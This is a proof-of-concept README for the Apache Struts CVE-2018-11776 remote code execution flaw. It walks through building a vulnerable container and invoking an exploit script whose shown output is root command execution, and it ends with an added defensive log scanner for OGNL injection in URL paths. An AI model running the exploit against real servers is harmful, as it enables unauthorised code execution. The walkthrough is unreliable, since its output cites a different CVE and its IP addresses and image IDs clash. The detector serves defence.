
CVE-2018-11776 PoC — Apache Struts input validation error vulnerability

Source
Associated Vulnerability
Title: Apache Struts input validation error vulnerability (CVE-2018-11776)
Description: Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.
Readme
<h3> Apache Struts CVE-2018-11776 Python PoC</h3>

<p>
This is based on https://github.com/hook-s3c/CVE-2018-11776-Python-PoC. The container build and instructions did not work as described in the README so this fork was created. The POC exploit used is from Rapid7.
</p>
<p>
Shoutout:
</p>

<p>
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter <br>
Rapid7 https://github.com/rapid7/metasploit-framework/issues/8064
</p>

<h3>Introduction</h3>

<p>
Man Yue Mo from Semmle has disclosed a Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.
</p>

<p>
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
</p>

<p>
The default configuration is not vulnerable. This container, like many real deployments, is configured so that it is vulnerable.
</p>

<h3>Step 1 - Build the Container</h3>

<p>
It's preferable to build a container from a Dockerfile when you can see what is going into the build.
</p>
<br>

<code>
   git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
</code>
<br>
<code>
   cd Struts
</code>
<br>
<code>
   docker build . -t freshdemo/apachestruts
</code>
<br><br>

<p>
Find the new container with
</p>
<br>

<code>
   docker images
</code>
<br><br>

<p>
The output should be similar to this, where you can get the image ID.
</p>
<br>

<pre>
root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images
REPOSITORY                                 TAG                 IMAGE ID            CREATED              SIZE
freshdemo/apachestruts                     latest              6586cedf49fa        About a minute ago   542MB
</pre>
<br>


<h3>Step 2 - Run the Container</h3>

<p>
Start a container from the image with the following, substituting the image ID shown in your own docker images output.
</p>
<br>

<code>
   docker run -d --name apachestruts -p 8080:8080 d39018c50afe
</code>
<br>

<h3>Step 3 - Exploit</h3>

<p>
Make sure any ingress/egress firewalls permit the port you specified earlier (8080), and run the exploit against your target with the following.
</p>
<br>

<code>
   python struts.py http://192.168.2.188:8080 'id'
</code>
<br><br>

<p>
Your output should be similar to this.
</p>
<br>

<pre>
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
http://13.88.250.188:8080 : [*] cmd: id


uid=0(root) gid=0(root) groups=0(root)
</pre>
<br>
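The introduction notes that the payload travels in the URL path, so a defender reviewing access logs can look for OGNL expression delimiters in the decoded path rather than the query string. The following detector is an added example, not part of the original repository; it assumes Apache/Tomcat combined log format and runs over constructed sample lines embedded below.

```python
import re
from urllib.parse import unquote

# Combined log format (the constructed sample lines below follow it):
# host ident user [time] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# OGNL expression delimiters never belong in a Struts action namespace.
# Matched after URL-decoding so encoded forms such as %24%7B are caught.
OGNL_MARKER = re.compile(r'[$%]\{')

def decode_path(target):
    """Return the fully decoded path portion of the request target (query dropped)."""
    path = target.split('?', 1)[0]
    prev = None
    # Decode until stable: double-encoding is a common way past single-pass filters.
    while path != prev:
        prev, path = path, unquote(path)
    return path

def flag_struts_namespace_injection(lines):
    """Return (host, decoded_path, status) for requests whose path carries OGNL markers.

    Only the path is inspected because CVE-2018-11776 is triggered through the
    namespace segment; OGNL in a query string is a different signal.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than crash on odd lines
        path = decode_path(m.group('target'))
        if OGNL_MARKER.search(path):
            hits.append((m.group('host'), path, int(m.group('status'))))
    return hits

# Constructed sample lines (not captured from a real system); ${1+1} is a harmless probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Aug/2018:10:01:02 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [22/Aug/2018:10:01:07 +0000] "GET /struts2-showcase/%24%7B1%2B1%7D/help.action HTTP/1.1" 302 0 "-" "curl/7.61"',
    '10.0.0.9 - - [22/Aug/2018:10:01:09 +0000] "GET /struts2-showcase/%2524%257B1%252B1%257D/help.action HTTP/1.1" 302 0 "-" "curl/7.61"',
    '10.0.0.7 - - [22/Aug/2018:10:02:00 +0000] "GET /search.action?q=%24%7Bfoo%7D HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for host, path, status in flag_struts_namespace_injection(SAMPLE_LOG):
        print(f'{host} -> {path} ({status})')
```

The second and third sample lines (single- and double-encoded) are flagged; the fourth is not, because its OGNL marker sits in the query string rather than the namespace path.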